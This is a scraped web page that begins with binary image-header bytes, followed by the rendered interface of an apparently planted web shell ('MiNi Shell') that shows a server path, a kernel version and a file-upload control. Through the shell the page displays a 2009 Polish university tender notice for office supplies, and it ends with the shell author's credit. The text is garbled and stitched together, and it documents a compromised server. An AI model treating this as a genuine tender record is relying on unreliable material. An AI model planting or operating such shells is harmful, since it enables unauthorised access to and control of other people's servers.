JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091021/184173-N-2009.html

<p class="kh_header"><b>Warszawa: Sukcesywna dostawa  różnego  sprzętu  i artykułów biurowych</b><br>
<b>Numer ogłoszenia: 184173 - 2009; data zamieszczenia: 21.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Główna Gospodarstwa Wiejskiego - SZP , ul. Nowoursynowska 166, 02-787 Warszawa, woj. mazowieckie, tel. 022 5931390, faks 022 5931391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sggw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa  różnego  sprzętu  i artykułów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa  różnego  sprzętu  i artykułów biurowych 

Opis przedmiotu zamówienia 
 Opis przedmiotu zamówienia Stanowiący załącznik nr 2 do SIWZ



Lp.
 Nazwa towaru
 Ilość (szt./op.)
 Jednostka miary
 
1
 Teczka z nadrukiem, skrzydłowa z gumką, wykonana z twardej 2mm tektury, powlekana folią 
polipropylenową, posiada fakturę lnu, format A4, mieści około 200 kartek, opatrzona logo
Wzór nadruku w punkcie 2.1 załącznika nr 2 do SIWZ.
Zasady wizualizacji w punkcie 3 załącznika nr 2 do SIWZ.
 1065
 szt.
 
2
 Teczka z nadrukiem, skrzydłowa z gumką, wykonana z twardej 2mm tektury, powlekana folią 
polipropylenową, posiada fakturę lnu, format A4, mieści około 200 kartek, opatrzona logo
Wzór nadruku w punkcie 2.2 załącznika nr 2 do SIWZ.
Zasady wizualizacji w punkcie 3 załącznika nr 2 do SIWZ.
 30
 szt.
 
3
 Notatnik z nadrukiem, format A4, klejony po 50 kartek, papier offset 80 g, podklejony kartonikiem 
Wzór nadruku w punkcie 2.3 załącznika nr 2 do SIWZ.
Zasady wizualizacji w punkcie 3 załącznika nr 2 do SIWZ.
 1065
 szt.
 
4
 Notatnik z nadrukiem, format A4, klejony po 50 kartek, papier offset 80 g, podklejony kartonikiem 
Wzór nadruku w punkcie 2.4 załącznika nr 2 do SIWZ.
Zasady wizualizacji w punkcie 3 załącznika nr 2 do SIWZ.
 30
 szt.
 
5
 Długopis z nadrukiem, długopisy kulkowe w kolorze niebieskim lub czarnym (w jednakowej ilości) na wymienne wkłady BKL-7, z metalową końcówką 0,7 mm, grubość linii pisania 0,27 mm, długość linii pisania min. 1700 m, skuwkę zawierającą silikonową kulkę zabezpieczającą przed wysychaniem, określona nazwa producenta na długopisie
Wzór nadruku w punkcie 2.5 załącznika nr 2 do SIWZ.
Zasady wizualizacji w punkcie 3 załącznika nr 2 do SIWZ.
 1275
 szt.
 
6
 Długopis z nadrukiem, długopisy kulkowe w kolorze niebieskim lub czarnym (w jednakowej ilości) na wymienne wkłady BKL-7, z metalową końcówką 0,7 mm, grubość linii pisania 0,27 mm, długość linii pisania min. 1700 m, skuwkę zawierającą silikonową kulkę zabezpieczającą przed wysychaniem, określona nazwa producenta na długopisie
Wzór nadruku w punkcie 2.5 załącznika nr 2 do SIWZ.
Zasady wizualizacji w punkcie 3 załącznika nr 2 do SIWZ.
 30
 szt.
 
7
 Ekierka 16 cm, 45 stopni, z przeźroczystego plastiku, odporna na odkształcenia i złamania, nieścieralne podziałki, podcięte brzegi  
 900
 szt.
 
8
 Kalkulator naukowy 249 funkcji, wyświetlacz LCD, 31 x 96 punktów, zasilanie - bateria AAA, wymiary (G x Sz x W) 13 x 80 x 161 mm, waga 110 g, automatyczne wyłączanie, regulacja kontrastu, z nadrukiem, typu Casio FX-82ES lub równoważny co do funkcjonalności, wielkości, okresu gwarancji.
Wzór nadruku w punkcie 2.6 załącznika nr 2 do SIWZ.
Zasady wizualizacji w punkcie 3 załącznika nr 2 do SIWZ
 900
 szt.
 
9
 Linijka plastikowa 30 cm, przeźroczysta
 900
 szt.
 
10
 Segregator A4, wykonany z tektury pokrytej PCV, z nadrukiem, z mechanizmem metalowym otwieranym i zamykanym za pomocą dźwigni, dodatkowo zacisk na kartki, szerokość grzbietu 75 mm, wyposażony w okucie dolnej krawędzi 
Wzór nadruku w punkcie 2.7 załącznika nr 2 do SIWZ.
Zasady wizualizacji w punkcie 3 załącznika nr 2 do SIWZ
 210
 szt.
 
11
 Ołówek drewniany z gumką, twardość HB, grafit w całości wklejany, kolorystyka różnorodna
 210
 szt.
 
12
 Zakreślacie fluorescencyjne płaskie, 4 kolory w etui, do różnych rodzajów papieru, ze ściętą końcówką umożliwiającą zakreślanie w zakresie grubości od 2 do 5 mm
Kolory: żółty, pomarańczowy, zielony, niebieski
 
 210
 szt.
 
13
 Przekładki kartonowe, format A4, składające się z 10 kolorowych stron i karty opisowej
 210
 szt.
 
14
 Pamięć przenośna - pendrive z nadrukiem, pojemność 2 GB.
Wzór nadruku w punkcie 2.8 załącznika nr 2 do SIWZ.
Zasady wizualizacji w punkcie 3 załącznika nr 2 do SIWZ
 210
 szt.
 


Inne informacje dotyczące przedmiotu zamówienia 

Dostarczanie towarów w opakowaniach zapakowanych fabrycznie. 

 Termin ważności towarów (przydatności do Użycia) musi wynosić minimum 12 miesięcy od daty dostawy danej partii do siedziby Zamawiającego. Na dostarczone towary Wykonawca udzieli Zamawiającemu minimum 12 miesięcznej gwarancji liczonej od dnia dostawy. 

 Transport towarów do siedziby Zamawiającego przy użyciu sprzętu i siłami Wykonawcy (siedziba  Zamawiającego znajduje się w Warszawie przy ul. Nowoursynowskiej 166, 02-787 Warszawa, bud. nr 2 pok. nr 11 ). 

 Rozpoczęcie dostaw towarów od 3 dnia po dniu zawarcia umowy.  

Realizacja dostaw sukcesywnie wg potrzeb Zamawiającego na podstawie zleceń przesyłanych do Wykonawcy elektronicznie, faksem lub pisemnie. 

 Termin realizacji dostaw w ciągu 3 dni roboczych od dnia złożenia zlecenia. 

 Zamawiający zastrzega sobie możliwość zmniejszenia ilości zamawianych towarów jednak wartość ilości towarów, o którą Zamawiający zmniejszy zamówienie nie może przekroczyć 20 % wartości umowy (brutto). 

 W przypadku skorzystania przez Zamawiającego z uprawnienia określonego w pkt. 7, Wykonawcy nie przysługują z tego tytułu żadne roszczenia. 

 Zamawiający zastrzega sobie prawo do zwiększenia ilości zamawianych w trakcie realizacji umowy towarów jednego typu kosztem zmniejszenia ilości zamawianych towarów innych typów. Powyższe zmiany nie mogą spowodować zmian cen jednostkowych oraz przekroczenia wartości umowy (brutto). 

 Nazwa własna towaru (marka, model) w pkt. 8 tabeli stanowiącej Opis przedmiotu zamówienia została Użyta w opisie przedmiotu zamówienia ze względu na specyfikę tego produktu, jednak Zamawiający dopuszcza oferty równoważne produktu co do wymiarów, liczby funkcji, okresu gwarancji oraz trwałości.

 Dla każdej pozycji asortymentu dostawca jest zobowiązany podać w formularzu cenowym markę, model oferowanego produktu. 

 W przypadku oferowania produktów równoważnych, udowodnienie równoważności leży po stronie Wykonawcy. Zgodnie z art. 30 ust 5 ustawy Prawo zamówień publicznych Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki ubiegania się o udzielenie zamówienia:
 

O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy: 
1)   posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)   posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym  i  osobami zdolnymi do wy­konania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów  do udostępnienia  potencjału technicznego  i osób  zdolnych do wykonania  zamówienia 
3)   znajdują się w sytuacji ekonomicznej i finansowej za­pewniającej wykonanie zamówienia, w oparciu o art. 22 ust.1.  
4)   nie podlegają wykluczeniu z postępowania o udzielenie zamówienia
 

2. Wykonawcy mogą wspólnie ubiegać się o udzielenie za­mó­wie­nia. W takim przypadku, wykonawcy usta­nawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
 

2a. Jeżeli oferta wykonawców, o których mowa w art. 23 ust. 1 , została wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
 

3. Informacje dotyczące spełniania minimalnych warunków udziału w postępowaniu:
 

NIE             

4. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu
SPEŁNIA / NIE SPEŁNIA 
 

5. Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na podstawie treści złożonych oświadczeń lub dokumentów wymaganych zgodnie rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2006 r. Nr 87, poz. 605) w brzmieniu nadanym przez rozporządzenie Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniające rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 188, poz. 1155)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wymagane oświadczenia lub dokumenty potwierdzające spełnianie warunków udziału w postępowaniu: 

1)   oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu (zał. nr 5 i zał. nr  7),
 
2)      w zakresie uprawnień do wykonywania określonej działalności lub czynności oraz nie podlegania wykluczeniu zgodnie z § 1 ust.1 pkt 1  rozporządzenia z dnia 19 maja 2006r. (Dz. U. z 2006 r. Nr 87, poz. 605). 
aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej   wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
(Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast powyższych dokumentów, składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że  nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje takich dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania).

aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy   wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
(Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje takich dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania)
 

     aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy   wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
(Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast powyższych dokumentów, składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające nie orzeczono wobec niego zakazu ubiegania się o zamówienie. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje takich dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania)
     aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu   wystawione nie wcześniej  3 miesiące przed upływem terminu składania ofert,
(Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast powyższych dokumentów, składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające nie orzeczono wobec niego zakazu ubiegania się o zamówienie. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje takich dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania)
3)    w zakresie posiadania niezbędnej wiedzy doświadczenia oraz dysponowania  potencjałem  technicznym i osobami zdolnymi do wykonania zamówienia

wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie 

         Za spełnienie tego warunku Zamawiający uzna wykazanie się co najmniej trzema dostawami różnego sprzętu i materiałów biurowych będących przedmiotem zamówienia o wartości 50 000 brutto PLN każda

3a) w zakresie potwierdzenia, że  oferowane  dostawy, usługi  lub  roboty  budowlane  odpowiadają  wymaganiom  określonym przez  zamawiającego :
 

     próbek
 

2. Dokumenty żądane przez zamawiającego w celu potwierdzenia spełniania warunków udziału w postępowaniu należy składać w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
3. Zamawiający  wzywa  wykonawców , którzy  w określonym  terminie  nie złożyli  wymaganych przez zamawiającego oświadczeń lub dokumentów , o których mowa  w art. 25 ust.1 , lub którzy nie złożyli  pełnomocnictw , albo którzy  złożyli  wymagane  przez zamawiającego  oświadczenia  i dokumenty , o których mowa  w art. 25 ust. 1 zawierające  błędy  lub którzy  złożyli  wadliwe pełnomocnictwa , do ich  złożenia  w wyznaczonym terminie , chyba  że mimo  ich złożenia oferta wykonawcy  podlega  odrzuceniu  albo konieczne byłoby  unieważnienie  postępowania. Złożone  na wezwanie  zamawiającego  oświadczenia  i dokumenty  powinny potwierdzać  spełnienie  przez wykonawcę  warunków udziału  postępowaniu  oraz spełnienie  przez oferowane  dostawy , usługi  lub roboty budowlane  wymagań  określonych  przez zamawiającego , nie  później  niż w dniu , w którym  upłynął  termin składania  wniosków  o dopuszczenie  do udziału  w postępowaniu  albo  termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://szp.sggw.pl/show.php?id=1513.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Główna Gospodarstwa Wiejskiego w Warszawie , Centrum Organizacji Badań i Szkoleń  SGGW  , ul. Nowoursynowska  166 , 02 787 Warszawa, bud. nr 2 pok. nr 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2009 godzina 11:00, miejsce: Centrum Organizacji Badań i Szkoleń SGGW , ul. Nowoursynowska 166 , 02-787 Warszawa, bud nr 2 pok. nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com